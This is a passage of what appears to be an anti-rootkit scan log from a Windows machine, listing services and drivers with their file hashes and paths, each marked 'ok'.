14:29:57.0513 1144 HomeGroupListener (efdfb3dd38a4376f93e7985173813abd) C:\Windows\system32\ListSvc.dll
14:29:57.0514 1144 HomeGroupListener - ok
14:29:57.0539 1144 HomeGroupProvider (908acb1f594274965a53926b10c81e89) C:\Windows\system32\provsvc.dll
14:29:57.0540 1144 HomeGroupProvider - ok
14:29:57.0592 1144 hotcore3 (cf512ee1c8299766241fc9a9d74f8db0) C:\Windows\system32\DRIVERS\hotcore3.sys
14:29:57.0593 1144 hotcore3 - ok
14:29:57.0611 1144 HpSAMD (39d2abcd392f3d8a6dce7b60ae7b8efc) C:\Windows\system32\drivers\HpSAMD.sys
14:29:57.0611 1144 HpSAMD - ok
14:29:57.0622 1144 HTTP (0ea7de1acb728dd5a369fd742d6eee28) C:\Windows\system32\drivers\HTTP.sys
14:29:57.0625 1144 HTTP - ok
14:29:57.0642 1144 hwpolicy (a5462bd6884960c9dc85ed49d34ff392) C:\Windows\system32\drivers\hwpolicy.sys
14:29:57.0642 1144 hwpolicy - ok
14:29:57.0656 1144 i8042prt (fa55c73d4affa7ee23ac4be53b4592d3) C:\Windows\system32\drivers\i8042prt.sys
14:29:57.0657 1144 i8042prt - ok
14:29:57.0700 1144 iaStor (d7921d5a870b11cc1adab198a519d50a) C:\Windows\system32\DRIVERS\iaStor.sys
14:29:57.0702 1144 iaStor - ok
14:29:57.0775 1144 IAStorDataMgrSvc (8fff9083252c16fe3960173722605e9e) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
14:29:57.0776 1144 IAStorDataMgrSvc - ok
14:29:57.0818 1144 iaStorV (aaaf44db3bd0b9d1fb6969b23ecc8366) C:\Windows\system32\drivers\iaStorV.sys
14:29:57.0820 1144 iaStorV - ok
14:29:57.0875 1144 idsvc (5988fc40f8db5b0739cd1e3a5d0d78bd) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
14:29:57.0878 1144 idsvc - ok
14:29:57.0903 1144 iirsp (5c18831c61933628f5bb0ea2675b9d21) C:\Windows\system32\drivers\iirsp.sys
14:29:57.0904 1144 iirsp - ok
14:29:57.0935 1144 IKEEXT (fcd84c381e0140af901e58d48882d26b) C:\Windows\System32\ikeext.dll
14:29:57.0938 1144 IKEEXT - ok
14:29:57.0967 1144 Intel® PROSet Monitoring Service (7a3f838f2d7c8fd8e8cff480384a798c) C:\Windows\system32\IProsetMonitor.exe
14:29:57.0968 1144 Intel® PROSet Monitoring Service - ok
14:29:57.0987 1144 intelide (f00f20e70c6ec3aa366910083a0518aa) C:\Windows\system32\drivers\intelide.sys
14:29:57.0987 1144 intelide - ok
14:29:58.0010 1144 intelppm (ada036632c664caa754079041cf1f8c1) C:\Windows\system32\DRIVERS\intelppm.sys
14:29:58.0010 1144 intelppm - ok
14:29:58.0026 1144 IPBusEnum (098a91c54546a3b878dad6a7e90a455b) C:\Windows\system32\ipbusenum.dll
14:29:58.0027 1144 IPBusEnum - ok
14:29:58.0048 1144 IpFilterDriver (c9f0e1bd74365a8771590e9008d22ab6) C:\Windows\system32\DRIVERS\ipfltdrv.sys
14:29:58.0048 1144 IpFilterDriver - ok
14:29:58.0057 1144 iphlpsvc (a34a587fffd45fa649fba6d03784d257) C:\Windows\System32\iphlpsvc.dll
14:29:58.0060 1144 iphlpsvc - ok
14:29:58.0065 1144 IPMIDRV (0fc1aea580957aa8817b8f305d18ca3a) C:\Windows\system32\drivers\IPMIDrv.sys
14:29:58.0065 1144 IPMIDRV - ok
14:29:58.0071 1144 IPNAT (af9b39a7e7b6caa203b3862582e9f2d0) C:\Windows\system32\drivers\ipnat.sys
14:29:58.0071 1144 IPNAT - ok
14:29:58.0139 1144 iPod Service (50d6ccc6ff5561f9f56946b3e6164fb8) C:\Program Files\iPod\bin\iPodService.exe
14:29:58.0142 1144 iPod Service - ok
14:29:58.0199 1144 IRENUM (3abf5e7213eb28966d55d58b515d5ce9) C:\Windows\system32\drivers\irenum.sys
14:29:58.0199 1144 IRENUM - ok
14:29:58.0209 1144 isapnp (2f7b28dc3e1183e5eb418df55c204f38) C:\Windows\system32\drivers\isapnp.sys
14:29:58.0210 1144 isapnp - ok
14:29:58.0229 1144 iScsiPrt (d931d7309deb2317035b07c9f9e6b0bd) C:\Windows\system32\drivers\msiscsi.sys
14:29:58.0230 1144 iScsiPrt - ok
14:29:58.0241 1144 kbdclass (bc02336f1cba7dcc7d1213bb588a68a5) C:\Windows\system32\DRIVERS\kbdclass.sys
14:29:58.0241 1144 kbdclass - ok
14:29:58.0255 1144 kbdhid (0705eff5b42a9db58548eec3b26bb484) C:\Windows\system32\DRIVERS\kbdhid.sys
14:29:58.0255 1144 kbdhid - ok
14:29:58.0291 1144 KeyIso (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:29:58.0291 1144 KeyIso - ok
14:29:58.0297 1144 KSecDD (ccd53b5bd33ce0c889e830d839c8b66e) C:\Windows\system32\Drivers\ksecdd.sys
14:29:58.0298 1144 KSecDD - ok
14:29:58.0312 1144 KSecPkg (9ff918a261752c12639e8ad4208d2c2f) C:\Windows\system32\Drivers\ksecpkg.sys
14:29:58.0313 1144 KSecPkg - ok
14:29:58.0319 1144 ksthunk (6869281e78cb31a43e969f06b57347c4) C:\Windows\system32\drivers\ksthunk.sys
14:29:58.0319 1144 ksthunk - ok
14:29:58.0339 1144 KtmRm (6ab66e16aa859232f64deb66887a8c9c) C:\Windows\system32\msdtckrm.dll
14:29:58.0341 1144 KtmRm - ok
14:29:58.0375 1144 LanmanServer (d9f42719019740baa6d1c6d536cbdaa6) C:\Windows\system32\srvsvc.dll
14:29:58.0377 1144 LanmanServer - ok
14:29:58.0403 1144 LanmanWorkstation (851a1382eed3e3a7476db004f4ee3e1a) C:\Windows\System32\wkssvc.dll
14:29:58.0404 1144 LanmanWorkstation - ok
14:29:58.0458 1144 lltdio (1538831cf8ad2979a04c423779465827) C:\Windows\system32\DRIVERS\lltdio.sys
14:29:58.0458 1144 lltdio - ok
14:29:58.0501 1144 lltdsvc (c1185803384ab3feed115f79f109427f) C:\Windows\System32\lltdsvc.dll
14:29:58.0503 1144 lltdsvc - ok
14:29:58.0521 1144 lmhosts (f993a32249b66c9d622ea5592a8b76b8) C:\Windows\System32\lmhsvc.dll
14:29:58.0521 1144 lmhosts - ok
14:29:58.0703 1144 LMIGuardianSvc (ad988709675d9e35a60b2616bef108e9) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
14:29:58.0705 1144 LMIGuardianSvc - ok
14:29:58.0748 1144 LMIInfo (0317335b15ff3bda8e10197e3434cfc0) C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys
14:29:58.0749 1144 LMIInfo - ok
14:29:58.0771 1144 LMIMaint (bd043199fc0bf5f2810f54c8b374590b) C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe
14:29:58.0772 1144 LMIMaint - ok
14:29:58.0850 1144 lmimirr (413ecdcfad9a82804d3674c8d7eec24e) C:\Windows\system32\DRIVERS\lmimirr.sys
14:29:58.0850 1144 lmimirr - ok
14:29:58.0866 1144 LMIRfsClientNP - ok
14:29:58.0899 1144 LMIRfsDriver (c57d3faa50e6f395759ffb7c709bd944) C:\Windows\system32\drivers\LMIRfsDriver.sys
14:29:58.0899 1144 LMIRfsDriver - ok
14:29:58.0951 1144 LogMeIn (d3760bc17e1755091b7120cf32dbf56b) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
14:29:58.0952 1144 LogMeIn - ok
14:29:58.0978 1144 LSI_FC (1a93e54eb0ece102495a51266dcdb6a6) C:\Windows\system32\drivers\lsi_fc.sys
14:29:58.0979 1144 LSI_FC - ok
14:29:58.0986 1144 LSI_SAS (1047184a9fdc8bdbff857175875ee810) C:\Windows\system32\drivers\lsi_sas.sys
14:29:58.0986 1144 LSI_SAS - ok
14:29:58.0991 1144 LSI_SAS2 (30f5c0de1ee8b5bc9306c1f0e4a75f93) C:\Windows\system32\drivers\lsi_sas2.sys
14:29:58.0992 1144 LSI_SAS2 - ok
14:29:58.0998 1144 LSI_SCSI (0504eacaff0d3c8aed161c4b0d369d4a) C:\Windows\system32\drivers\lsi_scsi.sys
14:29:58.0998 1144 LSI_SCSI - ok
14:29:59.0023 1144 luafv (43d0f98e1d56ccddb0d5254cff7b356e) C:\Windows\system32\drivers\luafv.sys
14:29:59.0023 1144 luafv - ok
14:29:59.0086 1144 lxefCATSCustConnectService (0c650620d4146e5eda65b93ec659a1e5) C:\Windows\system32\spool\DRIVERS\x64\3\\lxefserv.exe
14:29:59.0087 1144 lxefCATSCustConnectService - ok
14:29:59.0092 1144 lxef_device - ok
14:29:59.0112 1144 Mcx2Svc (0be09cd858abf9df6ed259d57a1a1663) C:\Windows\system32\Mcx2Svc.dll
14:29:59.0112 1144 Mcx2Svc - ok
14:29:59.0134 1144 megasas (a55805f747c6edb6a9080d7c633bd0f4) C:\Windows\system32\drivers\megasas.sys
14:29:59.0135 1144 megasas - ok
14:29:59.0145 1144 MegaSR (baf74ce0072480c3b6b7c13b2a94d6b3) C:\Windows\system32\drivers\MegaSR.sys
14:29:59.0146 1144 MegaSR - ok
14:29:59.0184 1144 MEIx64 (a6518dcc42f7a6e999bb3bea8fd87567) C:\Windows\system32\DRIVERS\HECIx64.sys
14:29:59.0184 1144 MEIx64 - ok
14:29:59.0204 1144 MMCSS (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
14:29:59.0205 1144 MMCSS - ok
14:29:59.0222 1144 Modem (800ba92f7010378b09f9ed9270f07137) C:\Windows\system32\drivers\modem.sys
14:29:59.0222 1144 Modem - ok
14:29:59.0241 1144 monitor (b03d591dc7da45ece20b3b467e6aadaa) C:\Windows\system32\DRIVERS\monitor.sys
14:29:59.0241 1144 monitor - ok
14:29:59.0255 1144 mouclass (7d27ea49f3c1f687d357e77a470aea99) C:\Windows\system32\DRIVERS\mouclass.sys
14:29:59.0255 1144 mouclass - ok
14:29:59.0266 1144 mouhid (d3bf052c40b0c4166d9fd86a4288c1e6) C:\Windows\system32\DRIVERS\mouhid.sys
14:29:59.0267 1144 mouhid - ok
14:29:59.0286 1144 mountmgr (32e7a3d591d671a6df2db515a5cbe0fa) C:\Windows\system32\drivers\mountmgr.sys
14:29:59.0287 1144 mountmgr - ok
14:29:59.0340 1144 mozybackup (19b2629c3f8e02b2e823738ff0ab1bfd) C:\Program Files\MozyHome\mozybackup.exe
14:29:59.0341 1144 mozybackup - ok
14:29:59.0369 1144 mozyFilter (a5c8838b68eddd5c738308b3a50cb350) C:\Windows\system32\DRIVERS\mozy.sys
14:29:59.0369 1144 mozyFilter - ok
14:29:59.0375 1144 mpio (a44b420d30bd56e145d6a2bc8768ec58) C:\Windows\system32\drivers\mpio.sys
14:29:59.0376 1144 mpio - ok
14:29:59.0381 1144 mpsdrv (6c38c9e45ae0ea2fa5e551f2ed5e978f) C:\Windows\system32\drivers\mpsdrv.sys
14:29:59.0381 1144 mpsdrv - ok
14:29:59.0424 1144 MpsSvc (54ffc9c8898113ace189d4aa7199d2c1) C:\Windows\system32\mpssvc.dll
14:29:59.0427 1144 MpsSvc - ok
14:29:59.0439 1144 MRxDAV (dc722758b8261e1abafd31a3c0a66380) C:\Windows\system32\drivers\mrxdav.sys
14:29:59.0439 1144 MRxDAV - ok
14:29:59.0462 1144 mrxsmb (a5d9106a73dc88564c825d317cac68ac) C:\Windows\system32\DRIVERS\mrxsmb.sys
14:29:59.0463 1144 mrxsmb - ok
14:29:59.0496 1144 mrxsmb10 (d711b3c1d5f42c0c2415687be09fc163) C:\Windows\system32\DRIVERS\mrxsmb10.sys
14:29:59.0497 1144 mrxsmb10 - ok
14:29:59.0510 1144 mrxsmb20 (9423e9d355c8d303e76b8cfbd8a5c30c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
14:29:59.0511 1144 mrxsmb20 - ok
14:29:59.0530 1144 msahci (c25f0bafa182cbca2dd3c851c2e75796) C:\Windows\system32\drivers\msahci.sys
14:29:59.0530 1144 msahci - ok
14:29:59.0565 1144 msdsm (db801a638d011b9633829eb6f663c900) C:\Windows\system32\drivers\msdsm.sys
14:29:59.0565 1144 msdsm - ok
14:29:59.0586 1144 MSDTC (de0ece52236cfa3ed2dbfc03f28253a8) C:\Windows\System32\msdtc.exe
14:29:59.0586 1144 MSDTC - ok
14:29:59.0601 1144 Msfs (aa3fb40e17ce1388fa1bedab50ea8f96) C:\Windows\system32\drivers\Msfs.sys
14:29:59.0601 1144 Msfs - ok
14:29:59.0625 1144 mshidkmdf (f9d215a46a8b9753f61767fa72a20326) C:\Windows\System32\drivers\mshidkmdf.sys
14:29:59.0625 1144 mshidkmdf - ok
14:29:59.0637 1144 msisadrv (d916874bbd4f8b07bfb7fa9b3ccae29d) C:\Windows\system32\drivers\msisadrv.sys
14:29:59.0637 1144 msisadrv - ok
14:29:59.0663 1144 MSiSCSI (808e98ff49b155c522e6400953177b08) C:\Windows\system32\iscsiexe.dll
14:29:59.0664 1144 MSiSCSI - ok
14:29:59.0668 1144 msiserver - ok
14:29:59.0693 1144 MSKSSRV (49ccf2c4fea34ffad8b1b59d49439366) C:\Windows\system32\drivers\MSKSSRV.sys
14:29:59.0694 1144 MSKSSRV - ok
14:29:59.0699 1144 MSPCLOCK (bdd71ace35a232104ddd349ee70e1ab3) C:\Windows\system32\drivers\MSPCLOCK.sys
14:29:59.0700 1144 MSPCLOCK - ok
14:29:59.0704 1144 MSPQM (4ed981241db27c3383d72092b618a1d0) C:\Windows\system32\drivers\MSPQM.sys
14:29:59.0705 1144 MSPQM - ok
14:29:59.0724 1144 MsRPC (759a9eeb0fa9ed79da1fb7d4ef78866d) C:\Windows\system32\drivers\MsRPC.sys
14:29:59.0725 1144 MsRPC - ok
14:29:59.0739 1144 mssmbios (0eed230e37515a0eaee3c2e1bc97b288) C:\Windows\system32\DRIVERS\mssmbios.sys
14:29:59.0739 1144 mssmbios - ok
14:29:59.0745 1144 MSTEE (2e66f9ecb30b4221a318c92ac2250779) C:\Windows\system32\drivers\MSTEE.sys
14:29:59.0745 1144 MSTEE - ok
14:29:59.0750 1144 MTConfig (7ea404308934e675bffde8edf0757bcd) C:\Windows\system32\drivers\MTConfig.sys
14:29:59.0751 1144 MTConfig - ok
14:29:59.0756 1144 Mup (f9a18612fd3526fe473c1bda678d61c8) C:\Windows\system32\Drivers\mup.sys
14:29:59.0756 1144 Mup - ok
14:29:59.0786 1144 mv61xx (7e045af28f71851aa5ece8c78aefce46) C:\Windows\system32\DRIVERS\mv61xx.sys
14:29:59.0786 1144 mv61xx - ok
14:29:59.0811 1144 napagent (582ac6d9873e31dfa28a4547270862dd) C:\Windows\system32\qagentRT.dll
14:29:59.0813 1144 napagent - ok
14:29:59.0860 1144 NativeWifiP (1ea3749c4114db3e3161156ffffa6b33) C:\Windows\system32\DRIVERS\nwifi.sys
14:29:59.0861 1144 NativeWifiP - ok
14:29:59.0892 1144 NDIS (79b47fd40d9a817e932f9d26fac0a81c) C:\Windows\system32\drivers\ndis.sys
14:29:59.0895 1144 NDIS - ok
14:29:59.0906 1144 NdisCap (9f9a1f53aad7da4d6fef5bb73ab811ac) C:\Windows\system32\DRIVERS\ndiscap.sys
14:29:59.0906 1144 NdisCap - ok
14:29:59.0923 1144 NdisTapi (30639c932d9fef22b31268fe25a1b6e5) C:\Windows\system32\DRIVERS\ndistapi.sys
14:29:59.0923 1144 NdisTapi - ok
14:29:59.0939 1144 Ndisuio (136185f9fb2cc61e573e676aa5402356) C:\Windows\system32\DRIVERS\ndisuio.sys
14:29:59.0939 1144 Ndisuio - ok
14:29:59.0946 1144 NdisWan (53f7305169863f0a2bddc49e116c2e11) C:\Windows\system32\DRIVERS\ndiswan.sys
14:29:59.0946 1144 NdisWan - ok
14:29:59.0958 1144 NDProxy (015c0d8e0e0421b4cfd48cffe2825879) C:\Windows\system32\drivers\NDProxy.sys
14:29:59.0958 1144 NDProxy - ok
14:29:59.0963 1144 NetBIOS (86743d9f5d2b1048062b14b1d84501c4) C:\Windows\system32\DRIVERS\netbios.sys
14:29:59.0963 1144 NetBIOS - ok
14:29:59.0970 1144 NetBT (09594d1089c523423b32a4229263f068) C:\Windows\system32\DRIVERS\netbt.sys
14:29:59.0971 1144 NetBT - ok
14:29:59.0997 1144 Netlogon (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:29:59.0998 1144 Netlogon - ok
14:30:00.0027 1144 Netman (847d3ae376c0817161a14a82c8922a9e) C:\Windows\System32\netman.dll
14:30:00.0029 1144 Netman - ok
14:30:00.0043 1144 netprofm (5f28111c648f1e24f7dbc87cdeb091b8) C:\Windows\System32\netprofm.dll
14:30:00.0044 1144 netprofm - ok
14:30:00.0093 1144 netr28ux (5eb01f698c4e2c11598934d4540047ca) C:\Windows\system32\DRIVERS\netr28ux.sys
14:30:00.0097 1144 netr28ux - ok
14:30:00.0137 1144 NetTcpPortSharing (3e5a36127e201ddf663176b66828fafe) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
14:30:00.0138 1144 NetTcpPortSharing - ok
14:30:00.0173 1144 nfrd960 (77889813be4d166cdab78ddba990da92) C:\Windows\system32\drivers\nfrd960.sys
14:30:00.0173 1144 nfrd960 - ok
14:30:00.0205 1144 NlaSvc (1ee99a89cc788ada662441d1e9830529) C:\Windows\System32\nlasvc.dll
14:30:00.0206 1144 NlaSvc - ok
14:30:00.0239 1144 Npfs (1e4c4ab5c9b8dd13179bbdc75a2a01f7) C:\Windows\system32\drivers\Npfs.sys
14:30:00.0239 1144 Npfs - ok
14:30:00.0257 1144 nsi (d54bfdf3e0c953f823b3d0bfe4732528) C:\Windows\system32\nsisvc.dll
14:30:00.0257 1144 nsi - ok
14:30:00.0273 1144 nsiproxy (e7f5ae18af4168178a642a9247c63001) C:\Windows\system32\drivers\nsiproxy.sys
14:30:00.0273 1144 nsiproxy - ok
14:30:00.0328 1144 Ntfs (a2f74975097f52a00745f9637451fdd8) C:\Windows\system32\drivers\Ntfs.sys
14:30:00.0333 1144 Ntfs - ok
14:30:00.0380 1144 NuidFltr (d4012918d3a3847b44b888d56bc095d6) C:\Windows\system32\DRIVERS\NuidFltr.sys
14:30:00.0380 1144 NuidFltr - ok
14:30:00.0401 1144 Null (9899284589f75fa8724ff3d16aed75c1) C:\Windows\system32\drivers\Null.sys
14:30:00.0401 1144 Null - ok
14:30:00.0419 1144 nusb3hub (01266516e6e88d183a2b58722eeb4443) C:\Windows\system32\DRIVERS\nusb3hub.sys
14:30:00.0420 1144 nusb3hub - ok
14:30:00.0444 1144 nusb3xhc (5ec04f55cc5f165f21752712437df638) C:\Windows\system32\DRIVERS\nusb3xhc.sys
14:30:00.0445 1144 nusb3xhc - ok
14:30:00.0486 1144 NVHDA (960e39a54e525df58cb29193147dffa1) C:\Windows\system32\drivers\nvhda64v.sys
14:30:00.0486 1144 NVHDA - ok
14:30:00.0880 1144 nvlddmkm (b34e9bfbd9c61048ef6281c3e7ec210a) C:\Windows\system32\DRIVERS\nvlddmkm.sys
14:30:00.0922 1144 nvlddmkm - ok
14:30:01.0085 1144 nvraid (0a92cb65770442ed0dc44834632f66ad) C:\Windows\system32\drivers\nvraid.sys
14:30:01.0086 1144 nvraid - ok
14:30:01.0116 1144 nvstor (dab0e87525c10052bf65f06152f37e4a) C:\Windows\system32\drivers\nvstor.sys
14:30:01.0116 1144 nvstor - ok
14:30:01.0169 1144 nvsvc (dfda089bb2cd0ff7e789e2ef6ba1e4ba) C:\Windows\system32\nvvsvc.exe
14:30:01.0173 1144 nvsvc - ok
14:30:01.0223 1144 nvUpdatusService (e7818cd4fb51284c948d68a7a85a69b8) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
14:30:01.0230 1144 nvUpdatusService - ok
14:30:01.0262 1144 nv_agp (270d7cd42d6e3979f6dd0146650f0e05) C:\Windows\system32\drivers\nv_agp.sys
14:30:01.0263 1144 nv_agp - ok
14:30:01.0269 1144 ohci1394 (3589478e4b22ce21b41fa1bfc0b8b8a0) C:\Windows\system32\drivers\ohci1394.sys
14:30:01.0270 1144 ohci1394 - ok
14:30:01.0340 1144 OpenVPNService (6c2e3718a4df94958515d30d8ac52e52) C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe
14:30:01.0341 1144 OpenVPNService - ok
14:30:01.0398 1144 ose (7a56cf3e3f12e8af599963b16f50fb6a) C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
14:30:01.0398 1144 ose - ok
14:30:01.0504 1144 p2pimsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
14:30:01.0505 1144 p2pimsvc - ok
14:30:01.0533 1144 p2psvc (927463ecb02179f88e4b9a17568c63c3) C:\Windows\system32\p2psvc.dll
14:30:01.0534 1144 p2psvc - ok
14:30:01.0561 1144 Parport (0086431c29c35be1dbc43f52cc273887) C:\Windows\system32\drivers\parport.sys
14:30:01.0562 1144 Parport - ok
14:30:01.0601 1144 partmgr (871eadac56b0a4c6512bbe32753ccf79) C:\Windows\system32\drivers\partmgr.sys
14:30:01.0601 1144 partmgr - ok
14:30:01.0617 1144 PcaSvc (3aeaa8b561e63452c655dc0584922257) C:\Windows\System32\pcasvc.dll
14:30:01.0618 1144 PcaSvc - ok
14:30:01.0629 1144 pci (94575c0571d1462a0f70bde6bd6ee6b3) C:\Windows\system32\drivers\pci.sys
14:30:01.0630 1144 pci - ok
14:30:01.0654 1144 pciide (b5b8b5ef2e5cb34df8dcf8831e3534fa) C:\Windows\system32\drivers\pciide.sys
14:30:01.0655 1144 pciide - ok
14:30:01.0678 1144 pcmcia (b2e81d4e87ce48589f98cb8c05b01f2f) C:\Windows\system32\drivers\pcmcia.sys
14:30:01.0679 1144 pcmcia - ok
14:30:01.0696 1144 pcw (d6b9c2e1a11a3a4b26a182ffef18f603) C:\Windows\system32\drivers\pcw.sys
14:30:01.0696 1144 pcw - ok
14:30:01.0706 1144 PEAUTH (68769c3356b3be5d1c732c97b9a80d6e) C:\Windows\system32\drivers\peauth.sys
14:30:01.0708 1144 PEAUTH - ok
14:30:01.0736 1144 PeerDistSvc (b9b0a4299dd2d76a4243f75fd54dc680) C:\Windows\system32\peerdistsvc.dll
14:30:01.0741 1144 PeerDistSvc - ok
14:30:01.0787 1144 PerfHost (e495e408c93141e8fc72dc0c6046ddfa) C:\Windows\SysWow64\perfhost.exe
14:30:01.0787 1144 PerfHost - ok
14:30:01.0820 1144 pla (c7cf6a6e137463219e1259e3f0f0dd6c) C:\Windows\system32\pla.dll
14:30:01.0825 1144 pla - ok
14:30:01.0857 1144 PlugPlay (25fbdef06c4d92815b353f6e792c8129) C:\Windows\system32\umpnpmgr.dll
14:30:01.0859 1144 PlugPlay - ok
14:30:01.0884 1144 PNRPAutoReg (7195581cec9bb7d12abe54036acc2e38) C:\Windows\system32\pnrpauto.dll
14:30:01.0884 1144 PNRPAutoReg - ok
14:30:01.0912 1144 PNRPsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
14:30:01.0914 1144 PNRPsvc - ok
14:30:01.0936 1144 PolicyAgent (4f15d75adf6156bf56eced6d4a55c389) C:\Windows\System32\ipsecsvc.dll
14:30:01.0938 1144 PolicyAgent - ok
14:30:01.0972 1144 Power (6ba9d927dded70bd1a9caded45f8b184) C:\Windows\system32\umpo.dll
14:30:01.0973 1144 Power - ok
14:30:02.0013 1144 PptpMiniport (f92a2c41117a11a00be01ca01a7fcde9) C:\Windows\system32\DRIVERS\raspptp.sys
14:30:02.0014 1144 PptpMiniport - ok
14:30:02.0035 1144 Processor (0d922e23c041efb1c3fac2a6f943c9bf) C:\Windows\system32\drivers\processr.sys
14:30:02.0035 1144 Processor - ok
14:30:02.0057 1144 ProfSvc (5c78838b4d166d1a27db3a8a820c799a) C:\Windows\system32\profsvc.dll
14:30:02.0058 1144 ProfSvc - ok
14:30:02.0079 1144 ProtectedStorage (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:02.0080 1144 ProtectedStorage - ok
14:30:02.0101 1144 Psched (0557cf5a2556bd58e26384169d72438d) C:\Windows\system32\DRIVERS\pacer.sys
14:30:02.0102 1144 Psched - ok
14:30:02.0133 1144 ql2300 (a53a15a11ebfd21077463ee2c7afeef0) C:\Windows\system32\drivers\ql2300.sys
14:30:02.0138 1144 ql2300 - ok
14:30:02.0160 1144 ql40xx (4f6d12b51de1aaeff7dc58c4d75423c8) C:\Windows\system32\drivers\ql40xx.sys
14:30:02.0161 1144 ql40xx - ok
14:30:02.0186 1144 QWAVE (906191634e99aea92c4816150bda3732) C:\Windows\system32\qwave.dll
14:30:02.0187 1144 QWAVE - ok
14:30:02.0203 1144 QWAVEdrv (76707bb36430888d9ce9d705398adb6c) C:\Windows\system32\drivers\qwavedrv.sys
14:30:02.0204 1144 QWAVEdrv - ok
14:30:02.0247 1144 radpms (58435613c2537715a9423597ec6635cc) C:\Windows\system32\DRIVERS\radpms.sys
14:30:02.0248 1144 radpms - ok
14:30:02.0269 1144 RasAcd (5a0da8ad5762fa2d91678a8a01311704) C:\Windows\system32\DRIVERS\rasacd.sys
14:30:02.0269 1144 RasAcd - ok
14:30:02.0298 1144 RasAgileVpn (7ecff9b22276b73f43a99a15a6094e90) C:\Windows\system32\DRIVERS\AgileVpn.sys
14:30:02.0298 1144 RasAgileVpn - ok
14:30:02.0336 1144 RasAuto (8f26510c5383b8dbe976de1cd00fc8c7) C:\Windows\System32\rasauto.dll
14:30:02.0337 1144 RasAuto - ok
14:30:02.0361 1144 Rasl2tp (471815800ae33e6f1c32fb1b97c490ca) C:\Windows\system32\DRIVERS\rasl2tp.sys
14:30:02.0362 1144 Rasl2tp - ok
14:30:02.0406 1144 RasMan (ee867a0870fc9e4972ba9eaad35651e2) C:\Windows\System32\rasmans.dll
14:30:02.0408 1144 RasMan - ok
14:30:02.0420 1144 RasPppoe (855c9b1cd4756c5e9a2aa58a15f58c25) C:\Windows\system32\DRIVERS\raspppoe.sys
14:30:02.0421 1144 RasPppoe - ok
14:30:02.0438 1144 RasSstp (e8b1e447b008d07ff47d016c2b0eeecb) C:\Windows\system32\DRIVERS\rassstp.sys
14:30:02.0439 1144 RasSstp - ok
14:30:02.0455 1144 rdbss (77f665941019a1594d887a74f301fa2f) C:\Windows\system32\DRIVERS\rdbss.sys
14:30:02.0456 1144 rdbss - ok
14:30:02.0463 1144 rdpbus (302da2a0539f2cf54d7c6cc30c1f2d8d) C:\Windows\system32\DRIVERS\rdpbus.sys
14:30:02.0463 1144 rdpbus - ok
14:30:02.0476 1144 RDPCDD (cea6cc257fc9b7715f1c2b4849286d24) C:\Windows\system32\DRIVERS\RDPCDD.sys
14:30:02.0476 1144 RDPCDD - ok
14:30:02.0495 1144 RDPDR (1b6163c503398b23ff8b939c67747683) C:\Windows\system32\drivers\rdpdr.sys
14:30:02.0496 1144 RDPDR - ok
14:30:02.0519 1144 RDPENCDD (bb5971a4f00659529a5c44831af22365) C:\Windows\system32\drivers\rdpencdd.sys
14:30:02.0520 1144 RDPENCDD - ok
14:30:02.0534 1144 RDPREFMP (216f3fa57533d98e1f74ded70113177a) C:\Windows\system32\drivers\rdprefmp.sys
14:30:02.0534 1144 RDPREFMP - ok
14:30:02.0590 1144 RDPWD (15b66c206b5cb095bab980553f38ed23) C:\Windows\system32\drivers\RDPWD.sys
14:30:02.0591 1144 RDPWD - ok
14:30:02.0598 1144 rdyboost (34ed295fa0121c241bfef24764fc4520) C:\Windows\system32\drivers\rdyboost.sys
14:30:02.0599 1144 rdyboost - ok
14:30:02.0637 1144 RemoteAccess (254fb7a22d74e5511c73a3f6d802f192) C:\Windows\System32\mprdim.dll
14:30:02.0637 1144 RemoteAccess - ok
14:30:02.0661 1144 RemoteRegistry (e4d94f24081440b5fc5aa556c7c62702) C:\Windows\system32\regsvc.dll
14:30:02.0662 1144 RemoteRegistry - ok
14:30:02.0679 1144 RpcEptMapper (e4dc58cf7b3ea515ae917ff0d402a7bb) C:\Windows\System32\RpcEpMap.dll
14:30:02.0679 1144 RpcEptMapper - ok
14:30:02.0700 1144 RpcLocator (d5ba242d4cf8e384db90e6a8ed850b8c) C:\Windows\system32\locator.exe
14:30:02.0700 1144 RpcLocator - ok
14:30:02.0722 1144 RpcSs (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
14:30:02.0724 1144 RpcSs - ok
14:30:02.0761 1144 rspndr (ddc86e4f8e7456261e637e3552e804ff) C:\Windows\system32\DRIVERS\rspndr.sys
14:30:02.0761 1144 rspndr - ok
14:30:02.0795 1144 s3cap (e60c0a09f997826c7627b244195ab581) C:\Windows\system32\drivers\vms3cap.sys
14:30:02.0795 1144 s3cap - ok
14:30:02.0820 1144 SamSs (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:02.0821 1144 SamSs - ok
14:30:02.0881 1144 SANDRA (5efbbfcc6adac121c8e2fe76641ed329) C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011.SP3\WNt500x64\Sandra.sys
14:30:02.0881 1144 SANDRA - ok
14:30:02.0925 1144 SandraAgentSrv (df7d83053f32dd52b7cc079eb3342c24) C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011.SP3\RpcAgentSrv.exe
14:30:02.0925 1144 SandraAgentSrv - ok
14:30:02.0979 1144 sbp2port (ac03af3329579fffb455aa2daabbe22b) C:\Windows\system32\drivers\sbp2port.sys
14:30:02.0979 1144 sbp2port - ok
